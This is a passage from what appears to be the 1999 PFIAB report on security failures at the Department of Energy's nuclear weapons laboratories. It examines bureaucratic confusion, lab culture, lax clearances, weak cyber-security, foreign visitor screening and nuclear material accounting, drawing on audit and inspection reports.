In commenting on security issues at DOE, we believe that both Congressional and Executive Branch leaders have resorted to simplification and
hyperbole in the past few months. The panel found neither the dramatic damage assessments nor the categorical reassurances of the Department’s
advocates to be wholly substantiated. We concur with and encourage many of Secretary Richardson’s recent initiatives to address the security problems at the
Department, and we are heartened by his aggressive approach and command of the issues. He has recognized the organizational dysfunction and cultural vagaries at
DOE and taken strong, positive steps to try to reverse the legacy of more than 20 years of security mismanagement. However, the Board is extremely skeptical that
any reform effort, no matter how well–intentioned, well–designed, and effectively applied, will gain more than a toehold at DOE, given its labyrinthine management
structure, fractious and arrogant culture, and the fast–approaching reality of another transition in DOE leadership. Thus we believe that he has overstated the case
when he asserts, as he did several weeks ago, that “Americans can be reassured: our nation’s nuclear secrets are, today, safe and secure.”
Similarly, the evidence indicating widespread security vulnerabilities at the weapons laboratories has been ignored for far too long, and the work of the Cox
Committee and intelligence officials at the Department has been invaluable in gaining the attention of the American public and in helping focus the political will
necessary to resolve these problems. Nonetheless, there have been many attempts to take the valuable coin of damaging new information and decrease its value by
manufacturing its counterfeit, innuendo; possible damage has been minted as probable disaster; workaday delay and bureaucratic confusion have been cast as
diabolical conspiracies. Enough is enough.
Fundamental change in DOE’s institutional culture—including the ingrained attitudes toward security among personnel of the weapons
laboratories—will be just as important as organizational redesign. Never have the members of the Special Investigative Panel witnessed a bureaucratic
culture so thoroughly saturated with cynicism and disregard for authority. Never before has this panel found such a cavalier attitude toward one of the most serious
responsibilities in the federal government—control of the design information relating to nuclear weapons. Particularly egregious have been the failures to enforce
cyber–security measures to protect and control important nuclear weapons design information. Never before has the panel found an agency with the bureaucratic
insolence to dispute, delay, and resist implementation of a Presidential directive on security, as DOE’s bureaucracy tried to do to the Presidential Decision Directive
No. 61 in February 1998.
The best nuclear weapons expertise in the U.S. government resides at the national weapons labs, and this asset should be better used by the
intelligence community. For years, the PFIAB has been keen on honing the intelligence community’s analytic effectiveness on a wide array of nonproliferation
areas, including nuclear weapons. We believe that the DOE Office of Intelligence, particularly its analytic component, has historically been an impediment to this goal
because of its ineffective attempts to manage the labs’ analysis. The office’s mission and size (about 70 people) is totally out of step with the Department’s
intelligence needs. A streamlined intelligence liaison body, much like Department of Treasury’s Office of Intelligence Support—which numbers about 20 people,
including a 24–hour watch team—would be far more appropriate. It should concentrate on making the intelligence community, which has the preponderance of
overall analytic experience, more effective in fulfilling the DOE’s analysis and collection requirements.
ROOT CAUSES
The sources of DOE’s difficulties in both overseeing scientific research and maintaining security are numerous and deep. The Special Investigative Panel primarily
focused its inquiry on the areas within DOE where the tension between science and security is most critical: the nuclear weapons laboratories.[1] To a lesser extent, the
panel examined security issues in other areas of DOE and broad organizational issues that have had a bearing on the functioning of the laboratories.
Inherent in the work of the weapons laboratories, of course, is the basic tension between scientific inquiry, which thrives on freewheeling searches for and wide
dissemination of information, and governmental secrecy, which requires just the opposite. But the historical context in which the labs were created and thrived has
also figured into their subsequent problems with security.
AN INTERNATIONAL ENTERPRISE
U.S. research laboratories have always had a tradition of drawing on immigrant talent. Perhaps the first foreign–born contributor to our nation’s nuclear program was
Albert Einstein. In his letter to President Roosevelt on August 2, 1939, Einstein advised the President of the possibility of the atomic bomb and the urgent need for
government action. By 1943, the ranks of the Manhattan Project at Los Alamos, New Mexico were filled with scientists and engineers from Italy (Fermi), Germany
(Bethe), Poland (Ulam), Hungary (Wigner, Szilard, Von Neumann, and Teller), Russia (Kistiakowsky) and Austria (Rabi). Indeed, it is possible that the atomic bomb
would never have been completed but for immigrant talent, and the diversity of talent applied to the project was hailed at the time as a model of international
cooperation. Eleanor Roosevelt, in a 1945 radio address, declared that the development of the atomic bomb by “many minds belonging to different races and
different religions sets the pattern for the way in which in the future we may be able to work out our difficulties.”[2]
The role of and reliance on immigrant talent in the United States—particularly at the graduate school and doctoral levels where much of the nation’s research is
performed—has increased over the years. From 1975 to 1992, the aging of America’s baby boomers resulted in a decline in the overall size of the college–age
population and, unlike other industrialized nations, the U.S. saw a decline in the number of American students receiving science and engineering degrees.[3]
From the 1950s until 1995, the number of non–U.S. citizens who earned doctorates in scientific and engineering fields from American universities steadily climbed,
reaching 27 percent by 1985 and 40 percent by 1995. Two–thirds of those receiving those doctorates in 1995 held temporary residency visas, and Chinese
doctoral recipients outnumbered recipients from all other regions combined.[4]
But the willingness to draw on foreign talent also has meant a greater risk of falling prey to those with foreign allegiances. One of the earliest and most infamous
espionage scandals at the nation’s nuclear laboratories was centered on the physicist Klaus Fuchs, a German native and naturalized British citizen who spied on
researchers at Los Alamos for the Soviet Union. More recent instances of actual and alleged foreign espionage at the nuclear weapons laboratories are detailed in
the Classified Appendix to this report.
As growth of the U.S. talent pool in science and engineering stagnated, and the amount of available talent abroad grew rapidly, the U.S. has had to rely on more
foreign–born talent in national scientific research and development programs in order to maintain the best research facilities in the world. At the same time, since the
end of the Cold War, DOE has entered into more extensive cooperative programs with foreign nations in efforts to reduce the threats of proliferation and diversion
of nuclear weapons material. By June 1990, DOE had entered into 157 bilateral research and development agreements for scientific exchange purposes. Among
others, parties to the agreements were the Soviet Union, the People’s Republic of China, Soviet bloc nations and countries that posed nuclear proliferation threats.[5]
In December 1990, a report to the DOE Secretary noted “a high probability of greatly increasing numbers of foreign visits and assignments to DOE facilities in future
years.”[6] The widening of foreign contacts concurrent with a greater influx of foreign–born talent has raised concerns about security compromises by scientists with
foreign allegiances and highlighted the need for special care in implementing formal clearance procedures for involvement in classified work.
BIG, BYZANTINE, AND BEWILDERING BUREAUCRACY
DOE is not one of the federal government’s largest agencies in absolute terms, but its organizational structure is widely regarded as one of the most confusing. That is
another legacy of its origins, and it has made the creation, implementation, coordination, and enforcement of consistent policies very difficult over the years.
The effort to develop the atomic bomb was managed through an unlikely collaboration of the Manhattan Engineering District of the U.S. Army Corps of Engineers
(hence the name, “the Manhattan Project”) and the University of California—two vastly dissimilar organizations in both culture and mission. The current form of the
Department took shape in the first year of the Carter Administration through the merging of more than 40 different government agencies and organizations, an event
from which it has arguably never recovered.
The newly created DOE subsumed the Federal Energy Administration, the Energy Research and Development Administration (ERDA), the Federal Power
Commission, and components and programs of several other government agencies. Included were the nuclear weapons research laboratories that were part of the
ERDA and, formerly, of the Atomic Energy Commission.
Many of these agencies and organizations have continued to operate under the DOE umbrella with the same organizational structure that they had prior to joining the
Department.
Even before the new Department was created, concerns were raised about how high the nuclear weapons–related operations would rank among the competing
priorities of such a large bureaucracy. A study of the issue completed in the last year of the Ford Administration considered three alternatives: shifting the weapons
operations to the Department of Defense, creating a new freestanding agency, or keeping the program within ERDA—the options still being discussed more than 20
years later. As one critic of the DOE plan told The Washington Post, “Under the AEC, weapons was half the program. Under ERDA, it was one–sixth. Under
DOE, it will be one–tenth. It isn’t getting the attention it deserves.” Although the proportions cited by that critic would prove to be inaccurate, he accurately spotted
the direction of the trend.
_____________________________________
The DOE Management Challenge
MISSION
· Lead agency for development of national energy resources and technologies.
· Responsible for the largest environmental cleanup effort in history.
· Nuclear energy and weapons research and development.
· Management of special nuclear materials stockpiles.
· Protection of highly sensitive classified and proprietary information against foreign and corporate espionage.
SIZE
· If included among the Nation’s Fortune 500 firms, would rank in the top 50.
· The fourth largest landowner in the United States.
· Budget of roughly $18 billion comprises close to 3 percent of total discretionary spending at the federal level.
· Employs more than 11,000 Federal employees and more than 100,000 contract employees.
· Owns and manages more than 50 major installations spread across 2.4 million acres and 35 states.
COMPLEXITY
· A diverse workforce of military and civilian personnel; U.S. citizens and foreign nationals; career federal officials and part-time researchers; white collar bureaucrats as well as scientists and engineers specializing in narrow esoteric fields.
· Constituencies include the White House, Congress, the power industry, multinational defense and aerospace corporations, major universities, states and municipalities seeking or monitoring environmental cleanups.
During 1978, its first year of operation within the new structure, DOE already had in place more than 9,500 prime contracts and more than 1,800 financial assistance
awards, which together were spread among 188 universities and more than 3,200 contractors. And the Department was growing: from 1977 to 1978, grants and
contracts with university researchers posted an increase of 22 percent.7
LACK OF ACCOUNTABILITY
Depending on the issue at hand, a line worker in a DOE facility might be responsible to DOE headquarters in Washington, a manager in a field office in another state,
a private contractor assigned to a DOE project, a research team leader from academia, or a lab director on another floor of the worker’s building. For example,
prior to Secretary Richardson’s restructuring initiative earlier this year, a single laboratory, Sandia, was managed or accountable to nine different DOE security
organizations.
Last year, after years of reports highlighting the problem of confused lines of authority, DOE was still unable to ensure the effectiveness of security measures because
of its inability to hold personnel accountable. A 1998 report lamented that “short of wholesale contract termination, there did not appear to be adequate
penalty/reward systems to ensure effective day–to–day security oversight at the contractor level.”8
The problem is not only the diffuse nature of authority and accountability in the Department. It is the dynamic and often informal character of the authority that does
exist. The inherently unpredictable outcomes of major experiments, the fluid missions of research teams, the mobility of individual researchers, the internal
competition among laboratories, the ebb and flow of the academic community, the setting and onset of project deadlines, the cyclical nature of the federal budgeting
process, and the shifting imperatives of energy and security policies dictated from the White House and Congress—all of these dynamic variables contribute to
volatility in the Department’s workforce and an inability to give the weapons–related functions the priority they deserved. Newcomers, as a result, have an
exceedingly hard time when they are assimilated; incumbents have a hard time in trying to administer consistent policies; and outsiders have a hard time divining
departmental performance and which leaders and factions are credible. Such problems are not new to government organizations, but DOE’s accountability vacuum
has only exacerbated them.
Management and security problems have recurred so frequently that they have resulted in nonstop reform initiatives, external reviews, and changes in policy
direction. As one observer noted in Science magazine in 1994: “Every administration sets up a panel to review the national labs. The problem is that nothing is done.”
The constant managerial turnover over the years has generated nearly continuous structural reorganizations and repeated security policy reversals. Over the last
dozen years, DOE has averaged some kind of major departmental shake–up every two to three years. During that time, security and counterintelligence
responsibilities have been “punted” from one office to the next.
CULTURE AND ATTITUDES
In the course of this inquiry, many officials interviewed by the PFIAB panel cited the scientific culture of the weapons laboratories as a factor that complicates,
perhaps even undermines, the ability of the Department to consistently implement its security procedures. Although there seemed to be no universally accepted
definition of the culture, nearly everyone agreed that it is distinct and pervasive.
One facet of the culture mentioned more than others is an arrogance borne of the simple fact that nuclear researchers specialize in one of the world’s most advanced,
challenging, and esoteric fields of knowledge. Nuclear physicists, by definition, are required to think in literally other dimensions not accessible to laymen. Thus it is
not surprising that they might bridle under the restraints and regulations of administrators and bureaucrats who do not entirely comprehend the precise nature of the
operation being managed.
Operating within a large, complex bureaucracy with transient leaders would only tend to accentuate a scientist’s sense of intellectual superiority: if administrators have
little more than a vague sense of the contours of a research project, they are likely to have little basis to know which rules and regulations constitute unreasonable
burdens on the researchers’ activities.
With respect to at least some security issues, the potential for conflicts over priorities is obvious. For example, how are security officials to weigh the risks of
unauthorized disclosures during international exchanges if they have only a general familiarity with the cryptic jargon used by the scientists who might participate?
The prevailing culture of the weapons labs is widely perceived as contributing to security and counterintelligence problems. At the very least, restoring public
confidence in the ability of the labs to protect nuclear secrets will require a thorough reappraisal of the culture within them.
CHANGING TIMES, CHANGING MISSIONS
The external pressures placed on the Department of Energy in general, and the weapons labs in particular, are also worth noting. For more than 50 years, America’s
nuclear researchers have operated in a maelstrom of shifting and often contradictory attitudes. In the immediate aftermath of World War II, nuclear discoveries were
simultaneously hailed as a destructive scourge and a panacea for a wide array of mankind’s problems. The production of nuclear arms was regarded during the
1950s and 1960s as one of the best indices of international power and the strength of the nation’s military deterrent.
During the 1970s, the nation’s leadership turned to nuclear researchers for solutions to the energy crisis at the same time that the general public was becoming more
alarmed about the nuclear buildup and the environmental implications of nuclear facilities.
Over the past 20 years, some in Congress have repeatedly called for the dissolution of the Department of Energy, which has undoubtedly been a distraction to those
trying to make long–term decisions affecting the scope and direction of the research at the labs. And in the aftermath of the Cold War, the Congress has looked to
the nation’s nuclear weapons labs to help in stabilizing or dismantling nuclear stockpiles in other nations.
Each time that the nation’s leadership has made a major change in the Department’s priorities or added another mission, it has placed additional pressure on a
government agency already struggling to preserve and expand one of its most challenging historical roles: guarantor of the safety, security, and reliability of the
nation’s nuclear weapons.
RECURRING VULNERABILITIES
Over the past 20 years, six DOE security issues have received the most scrutiny and criticism from both internal and external reviewers: long–term security planning
and policy implementation; physical security over facilities and property; screening and monitoring of personnel; protection of classified and sensitive information,
particularly information that is stored electronically in the Department’s computers; accounting for nuclear materials; and the foreign visitors’ programs.
MANAGEMENT AND PLANNING
Management of security and counterintelligence has suffered from chronic problems since the creation of the Department of Energy in 1977.
During the past decade, the mismatch between DOE’s security programs and the severity of the threats faced by the Department grew more pronounced. While the
number of nations possessing, developing, or seeking weapons of mass destruction continued to rise, America’s reliance on foreign scientists and engineers
dramatically increased, and warnings mounted about the espionage goals of other nations, DOE spending on safeguards and security decreased by roughly one–third.1
The widening gap between the level of security and the severity of the threat resulted in cases where sensitive nuclear weapons information was certainly lost to
espionage. In countless other instances, such information was left vulnerable to theft or duplication for long periods, and the extent to which these serious lapses may
have damaged American security is incalculable. DOE’s failure to respond to warnings from its own analysts, much less independent sources, underscores the depth
of its managerial weakness and inability to implement legitimate policies regarding well–founded threats.
_________________________________________
A Sample of Security Issues
MANAGEMENT AND PLANNING
· Decentralized decisionmaking undermines consistency of policies.
· Lack of control for security budget has allowed diversion of funds to other priorities.
· Department leaders with little experience in security and intelligence.
· Lack of accountability.
PHYSICAL SECURITY
· Training insufficient for some security personnel.
· Nuclear materials stored in aging buildings not designed for containment purposes.
· Recurring problems involving lost or stolen property.
· Poor management results in unnecessary training and purchasing costs.
PERSONNEL SECURITY CLEARANCES
· Extended lags in obtaining clearances, reinvestigating backgrounds, and terminating clearance privileges for former employees.
· Some contractors not adequately investigated or subject to drug & substance abuse policies.
· Lack of uniform procedures and accurate data.
· Inadequate pre–employment screening.
· More clearances granted than necessary.
PROTECTION OF CLASSIFIED INFORMATION
· Poor labeling and tracking of computer media containing classified information.
· Problems with lax enforcement of password policies.
· Network, email, and Internet connections make transfer of large amounts of data easier.
ACCOUNTING FOR NUCLEAR MATERIALS
· Chronic problems in devising and operating an accurate accounting system of tracking stocks and flows of nuclear materials.
FOREIGN VISITORS
· Weak systems for tracking visits and screening backgrounds of visiting scientists.
· Decentralization makes monitoring of discussions on sensitive topics difficult.
During the mid–1980s, the predominant concern of DOE officials was improving the physical security of the nuclear weapons laboratories and plants. Following a
January 1983 report2 that outlined vulnerabilities of the weapons labs to terrorism, the Department embarked on a five–year program of construction and purchases
that would see its overall safeguards and security budget roughly double and its spending on upgrades nearly triple. Included was money for additional guards,
security training, helicopters, fortified guard towers, vehicle barriers, emergency planning, and advanced alarm systems.3
Improving physical security in a wide array of nuclear weapons facilities whose replacement value was an estimated $100 billion,4 proved to be difficult. Reports
through the late 1980s and early 1990s continued to highlight deficiencies in the management of physical security. In the late 1980s, priorities began to shift
somewhat. Listening devices were discovered in weapons–related facilities,5 and a 1990 study advised the Department leadership of an intensifying threat from
foreign espionage. Less and less able to rely on the former Soviet Union to supply technology and resources, an increasing number of states embarked on campaigns
to bridge the economic and technological gap with the United States by developing indigenous capabilities in high technology areas. The study noted that the freer
movement of goods, services and information in a less hostile world “intensified the prospects and opportunities for espionage as missing pieces of critically needed
information became more easily identified.”6
An intelligence report further highlighted the changing foreign threat to the labs by noting that “new threats are emerging from nontraditional adversaries who target
issues key to U.S. national security. DOE facilities and personnel remain priority targets for hostile intelligence collection.”7 Anecdotal evidence corroborates, and
intelligence assessments agree, that foreign powers stepped up targeting of DOE during the early 1990s. (See Classified Appendix) While this threat may have been
taken seriously at the highest levels of the DOE, it was not uniform throughout the Department.
A former FBI senior official noted in discussions with the PFIAB investigative panel that DOE lab scientists during these years appeared naive about the level of
sophistication of the nontraditional threat posed by Chinese intelligence collection. The trend in openness to foreign visitors and visits does not indicate any sense of
heightened wariness. A 1997 GAO report concluded that from mid–1988 to the mid–1990s, the number of foreign visitors to key weapons labs increased from
3,800 to 5,900 annually and sensitive country visitors increased from 500 to more than 1,600.8 Meanwhile, the DOE budget for counterintelligence was in
near–constant decline.
How Long Does It Take?
Each year DOE security officials compile audits to identify security lapses and vulnerabilities in the facilities and procedures of the nuclear weapons laboratories
and plants. The following year, they report on whether the problems have been addressed. Given the sensitivity of what was being protected—information
about how to build, miniaturize, store, and maximize the destructiveness of nuclear weapons—the numbers logged in the audits are remarkable:
11: No. of months a DOE employee was dead before Department officials realized four documents with CLASSIFIED and RESTRICTED DATA were still assigned to him.
20: No. of months before DOE officials could ensure that improperly stored classified computer media had been properly safeguarded.
24: No. of months it took to order security labels (SECRET, TOP SECRET, etc.) for mislabeled software.
31: No. of months that 2,750 out of 3,000 non-classified computer terminals were connected and being used on a classified network.
31: No. of months to write and approve a network security plan.
35: No. of months it took DOE officials to write a work order to replace a lock at a weapons lab facility containing sensitive nuclear information.
45: No. of months taken to correct a broken doorknob that was sticking in an open position and allowing access to sensitive areas.
51: No. of months to correct a mistake that allowed secure telephone cryptographic materials to go improperly safeguarded.
?: No. of months before a security audit team discovered that the main telephone frame room door at a weapons lab had been forced open and the lock destroyed.
SOURCE: DEPT. OF ENERGY
As noted in the previous chapter, federal officials in charge of oversight of nuclear weapons laboratories have historically allowed decisionmaking on basic aspects of
security to be decentralized and diffuse. With their budget spread piecemeal throughout a number of offices, security and counterintelligence officials often found
themselves with a weak voice in internal bureaucratic battles and an inability to muster the authority to accomplish their goals. Indeed, an excerpt from a history of the
early years of the Atomic Energy Commission reads much like recent studies:
Admiral Gingrich, who had just resigned as director of security [in 1949], had expressed to the Joint Committee [on Atomic Energy] a lack of
confidence in the Commission’s security program. Gingrich complained that decentralization of administrative functions to the field offices had left him
with little more than a staff function at headquarters; even there, he said, he did not control all the activities that seemed properly to belong to the
director of security.9
More than 30 years later, decentralization still posed a problem for security managers. An internal DOE report in 1990 found that the Department lacked a
comprehensive approach to management of threats and dissemination of information about them.10 A DOE annual report in 1992 found that security “has suffered
from a lack of management focus and inconsistent procedural execution throughout the DOE complex. The result is that personnel are seldom held responsible for
their disregard, either intentional or unintentional, of security requirements.”11
The counterintelligence effort at DOE in the late 1980s and mid–1990s was in its infancy and grossly underfunded. Although the Department could have filled its gap
in some areas, such as counterintelligence information, through cooperation with the broader intelligence community, PFIAB research and interviews indicate that
DOE headquarters’ relationship with the FBI—the United States’ primary domestic CI organization—was strained at best.
DOE requested an FBI agent detailee in 1988 to assist in developing a CI program, but the agent found that DOE failed to provide management support or access
to senior DOE decisionmakers. A formal relationship with the FBI was apparently not established until 1992: a Memorandum of Understanding between the FBI
and DOE on respective responsibilities concerning the coordination and conduct of CI activities in the United States. However, in 1994 two FBI detailees assigned
to DOE complained about their limited access and were pulled back to FBI because of a “lack of control of the CI program by DOE headquarters which resulted in
futile attempts to better manage the issue of foreign visitors at the laboratories.”12
________________________________
We asked a number of DOE officials to whom they report, to whom they were responsible. Invariably, their answer was: “It depends.”
The haphazard assortment of agencies and missions folded into DOE has become so confusing as to become a running joke within the institution. In the course of the
panel’s research and interviews, rare were the senior officials who expressed any sort of confidence in their understanding of the extent of the agency’s operations,
facilities, or procedures. Time and again, PFIAB panel members posed the elementary questions to senior DOE officials. To whom do you report? To whom are
you accountable? The answer, invariably, was: “It depends.”
DOE’s relationship with the broader intelligence community was not well–defined until the mid–1990s. Coordination between DOE CI elements and the broader
intelligence community, according to a 1992 intelligence report, was hampered from the 1980s through the early 1990s by DOE managers’ inadequate
understanding of the intelligence community.13 The Department did not become a core member of the National Counterintelligence Policy Board (established in
1994 under PDD-24) until 1997.
Over much of the past decade, rather than a heightened sensitivity to espionage threats recognized widely throughout the intelligence community, DOE lab officials
have operated in an environment that allowed them to be sanguine, if not skeptical. Numerous DOE officials interviewed by the PFIAB panel stated that they
believed that the threat perception was weakened further during the administration of Secretary O’Leary, who advanced the labs’ openness policies and downgraded
security as an issue by terminating some security programs instituted by her predecessor.
Even when the CI budget was expanded in the late–1990s, the expenditures fell short of the projected increases. In Fiscal Year 1997, for example, DOE’s CI
budget was $3.7 million but the actual expenditures on CI were only two–thirds of that level, $2.3 million. Shortly before the 1997 GAO and FBI reports on DOE’s
counterintelligence posture were issued, DOE began instituting changes to beef up its counterintelligence and foreign intelligence analytic capabilities.14
When DOE did devote its considerable resources to security, it too often faltered in implementation. A report to the Secretary in January 1994 noted “growing
confusion within the Department with respect to Headquarters’ guidance for safeguards and security. At this time, there is no single office at Headquarters
responsible for the safeguards and security program. Most recently, a number of program offices have substantially expanded their safeguards and security staff to
office–size organizations. These multiple safeguards and security offices have resulted in duplication of guidance, unnecessary requests for information and
clarification, and inefficient program execution. Unchecked, this counterproductive tendency threatens the success of the overall safeguards and security effort.”15
A 1996 DOE Inspector General report found that security personnel at the weapons programs had purchased and stockpiled far more firepower—ranging from
handguns and rifles to submachine guns and grenade launchers—than could ever be used in an actual emergency. The Oak Ridge facilities had more than three
weapons per armed security officer—on and off duty. Los Alamos National Laboratory had more than four.16
____________________________________
Foreign agents could probably not shoot their way into U.S. weapons laboratories. But they could apply for an access pass to walk in and strike up a conversation.
Around the same time, GAO security audits of the research laboratories at these sites found lax procedures for issuing access passes to secure areas, inadequate
prescreening of the more than 1,500 visitors from sensitive countries that visited the weapons laboratories annually, and poor tracking of the content of discussions
with foreign visitors. The implication: foreign agents could probably not shoot their way past the concertina wires and bolted doors to seize secrets from U.S.
weapons laboratories, but they would not need to do so. They could probably apply for an access pass, walk in the front door, and strike up a conversation.
PHYSICAL SECURITY
The physical security of the Department of Energy’s weapons–related programs is roughly divided into two essential functions: tracking and control over the property
and equipment within the weapons-related laboratories, and keeping unwarranted intruders out, often referred to as the realm of “guns, guards, and gates.”
The general approach to security, of course, was defined by the emphasis on secrecy associated with nuclear weapons program during World War II. Los Alamos
National Laboratory was created as a “closed city”—a community with a high degree of self-sufficiency, clearly defined and protected boundaries, and a minimum of
ingress from and egress to the outer world. Although the community is no longer “closed,” the weapons laboratories at Los Alamos, like those at the other national
laboratories, still retain formidable physical protections and barriers. In examining the history of the laboratories, the panel found only a few instances where an
outsider could successfully penetrate the grounds of an operation by destruction of a physical safeguard or direct violent assault.
__________________________________
Clearances to secure DOE areas have been granted simply for convenience, such as to reduce the length of an employee’s walk from the car to the office each morning.
In visits to several of the weapons laboratories, the members of the Special Investigative Panel were impressed by the great amount of attention and investment
devoted to perimeter control, weaponry, and security of building entrances and exits. Indeed, one cannot help but be struck by the forbidding and formidable
garrison–type atmosphere that is prevalent at many of the facilities: barbed wire, chain–link fences, electronic sensors, and surveillance cameras. Further, the panel
recognizes that the labs themselves have developed and produced some of the most sophisticated technical security devices in the world. Nonetheless, DOE reports
and external reviews since at least 1984 have continued to raise concerns about aging security systems.17
Management of the secure environments at the laboratories has posed more serious problems. As noted earlier, DOE may be spending too much money in some
areas, buying more weapons than could conceivably be used in an emergency situation. In other cases, it may be spending too little. Budget cuts in the early and
mid-1990s led to 40 to 50 percent declines in officer strength and over-reliance on local law enforcement. Resources became so low that normal protective force
operations required “the use of overtime scheduling to accomplish routine site protection.”18 GAO has found an assortment of problems at Los Alamos over the past
decade: security personnel failed basic tests in such tasks as firing weapons, using a baton, or handcuffing a suspect, and inaccurate and incomplete records were
kept on security training.19 Other DOE facilities have had substantial problems in management of physical property.
· In 1990, Lawrence Livermore Laboratory could not account for 16 percent of its inventory of government equipment, acquired at a cost of $18.6 million.20
· In 1993, DOE sold 57 components of nuclear reprocessing equipment and associated documents, including blueprints, to an Idaho salvage dealer. Much of what was sold was subsequently found to be potentially useful to any nation attempting to develop or advance its own reprocessing operation.21
· Following a GAO report in 1994, which found that the Rocky Flats facility was unable to account for large pieces of equipment such as forklifts and a semitrailer, some $21 million in inventory was written off.22
DOE had begun to consolidate its growing stockpile of sensitive nuclear material by 1992, but a 1997 DOE report to the Secretary found that significant quantities
of the material “remain in aging buildings and structures, ranging in age from 12 to 50 years, that were never intended for use as storage facilities for extended
periods.”23
SCREENING AND MONITORING OF PERSONNEL
Insider threats to security have been a chronic problem at the nation’s weapons laboratories. From the earliest years, the importance of the labs’ missions and their
decentralized structure have had an uneasy coexistence with the need for thorough background investigations of researchers and personnel needing access to
sensitive areas and information.
In 1947, the incoming director of security for the AEC was greeted with a backlog of more than 13,000 background investigations and a process where clearances
had been dispersed to field offices that operated with few formal guidelines.24
Forty years later, GAO found that the backlog of personnel security investigations had increased more than nine-fold, to more than 120,000. Moreover, many
clearances recorded as valid in the Department’s records should have been terminated years before.25
____________________________________
Even after DOE discovered listening devices in some of its weapons laboratories, security audits found that thousands of “Q” clearances were being given to inappropriate personnel.26
The research of the PFIAB panel found that problems with personnel security clearances, while mitigated in some aspects, have persisted to an alarming degree.
From the mid–1980s through the mid–1990s, the DOE Inspector General repeatedly warned Department officials that personnel were receiving clearances that
were much higher than warranted and that out-dated clearances were not being withdrawn on a timely basis. The issue became more urgent with the discovery of a
clandestine surveillance device at a nuclear facility.27
But problems persisted. DOE Inspector General reports in 1990 and 1991 found that one of the weapons laboratories had granted “Q” clearances (which provide
access to U.S. government nuclear weapons data) to more than 2,000 employees who did not need access to classified information.28 A 1992 report to the
Secretary of Energy noted that “DOE grants clearances requested by its three major defense program sponsored labs based on lab policies to clear all employees
regardless of whether actual access to classified interests is required for job performance.”29
Three years later, a review of personnel security informed the Secretary there were “individuals who held security clearances for convenience only and limited
security clearances to those individuals requiring direct access to classified matter or [special nuclear materials] to perform official duties.”30
More recent evidence is no more reassuring. A counterintelligence investigation at a nuclear facility discovered that the subject of an inquiry had been granted a “Q”
clearance simply to avoid the delay caused by the normal processing of a visit.31 That same year, an illegal telephone wiretap was discovered at the same lab. The
employee who installed it confessed, but was not prosecuted by the government.32
PROTECTION OF CLASSIFIED AND SENSITIVE INFORMATION
Two vulnerabilities regarding classified and sensitive information at DOE have recurred repeatedly throughout the past 20 years: inappropriate release of classified
information, either directly through inadvertence or indirectly through improper declassification; and the increasing mobility of classified and sensitive information
through electronic media, such as computers.
As computers have progressed from the large mainframes of the 1950s and 1960s to desktop models in the 1980s and decentralized networks in the 1990s, it has
become progressively easier for individuals to retrieve and transport large amounts of data from one location to another. This has presented an obvious problem for
secure environments. GAO found in 1991 that DOE inspections revealed more than 220 security weaknesses in computer systems across 16 facilities. Examples
included a lack of management plans, inadequate access controls, and failures to test for compliance with security procedures.33
As a 1996 DOE report to the President said, “adversaries no longer have to scale a fence, defeat sensors, or bypass armed guards to steal nuclear or leading–edge
‘know-how’ or to shut down our critical infrastructure. They merely have to defeat the less ominous obstacles of cyber–defense.”34
_____________________________________
Computer systems at some DOE facilities were so easy to access that even Department analysts likened them to “automatic teller machines, [allowing] unauthorized withdrawals at our nation’s expense.”
DOE’s cyber–defenses were, in fact, found to be “less ominous obstacles.” In 1994, an internal DOE review found that despite security improvement “users of
unclassified computers continue to compromise classified information due to ongoing inadequacies in user awareness training, adherence to procedures, enforcement
of security policies, and DOE and [lab] line management oversight.”35 Also in 1994, a report to the Energy Secretary cited five areas of concern: “failure to properly
accredit systems processing classified information, lack of controls to provide access authorities and proper password management; no configuration management;
improper labeling of magnetic media; and failure to perform management reviews.”36
Apparently, the warnings were to no avail. A year later, the annual report to the Secretary noted: “Overall, findings and surveys, much like last year, continue to
reflect deficiencies in self–inspections and procedural requirements or inappropriate or inadequate site guidance … In the area of classified matter protection and
control, like last year, marking, accountability, protection, and storage deficiencies are most numerous.”37
Some reports made extra efforts to puncture through the fog of bureaucratic language. A 1995 report to the President said: “By placing sensitive information on
information systems, we increase the likelihood that inimicable interests, external and internal, will treat those systems as virtual automatic teller machines, making
unauthorized withdrawals at our nation’s expenses.” Indeed, a report found security breaches at one of the major weapons facilities in which documents with
unclassified but sensitive information “were found to be stored on systems that were readily accessible to anyone with Internet access.”38 In other instances,
personnel were found to be sending classified information to outsiders via an unclassified email system.39
Ahead of its Time
In 1986, the DOE Office of Safeguards and Quality Assessment issued an inspection report on a weapons lab that warned of shortcomings in computer
security and noted that the “ability of [a] user to deliberately declassify a classified file without detection and move classified information from the secure
partition to the open partition can be made available to any authorized user either on or off site.”40
The warning turned out to be on the mark. In April of this year, Energy Secretary Bill Richardson issued a statement: “While I cannot comment on the specifics,
I can confirm that classified nuclear weapons computer codes at Los Alamos were transferred to an unclassified computer system. This kind of egregious
security breach is absolutely unacceptable ... .”
Even though the hard evidence points to only sporadic penetrations of the labs by foreign intelligence services (see classified appendix), volumes of sensitive and
classified information may have been lost over the years—via discarded or purloined documents; uninformed and often improperly vetted employees, and a maze of
uncontrolled computer links. In one recent case discovered by PFIAB, lab officials initially refused to rectify a security vulnerability because “no probability is
assigned to [a loss of sensitive information], just the allegation that it is possible.”41
As recent as last year’s annual DOE report to the President, security analysts were finding “numerous incidents of classified information being placed on unclassified
systems, including several since the development of a corrective action plan in July 1998.”42
TRACKING OF NUCLEAR MATERIALS: HOW MUCH MUF?
MUF stands for “materials unaccounted for,” the official term used until the late 1970s for discrepancies in the amount of nuclear materials that can be physically
located in inventory versus the amount noted in Department records. MUF (now termed with the more politic phrase “inventory differences”) has been a recurring
concern—and debate—in the nuclear research field since the beginning. The question at the center of the debate: if large quantities of nuclear material are impossible
to measure with absolute precision, what constitutes a significant loss?
As in many questions, the answer depends on whom you ask. Officials of nuclear research facilities have argued that the scale and complexity of the processing and
handling of nuclear material inevitably result in losses that are detectable but inconsequential. Outside observers have tended to be less sanguine about what
constitutes a significant loss from a security standpoint.
In 1976, the General Accounting Office reported that the Nuclear Regulatory Commission and the Energy Research and Development Administration (DOE’s
predecessor) could not account for 8,000 pounds of highly enriched uranium and plutonium. Officials of the two agencies responded that part of the accounting
discrepancy could be ascribed to the statistical margin of error in their measuring equipment, the rest was probably dregs created during processing and left in
machinery parts, wiping cloths, and scrap items.43
Critics of the agencies have pointed out that thieves could easily use the variance in statistical measures to cover their tracks, stealing an increment during each
measuring period that falls just within the margin of error. They have also pointed out that if Department records are not accurate, it is impossible for anyone to
estimate the stock of nuclear material at any given point, much less the difference between two levels as it proceeds from one stage of the nuclear cycle to the next.
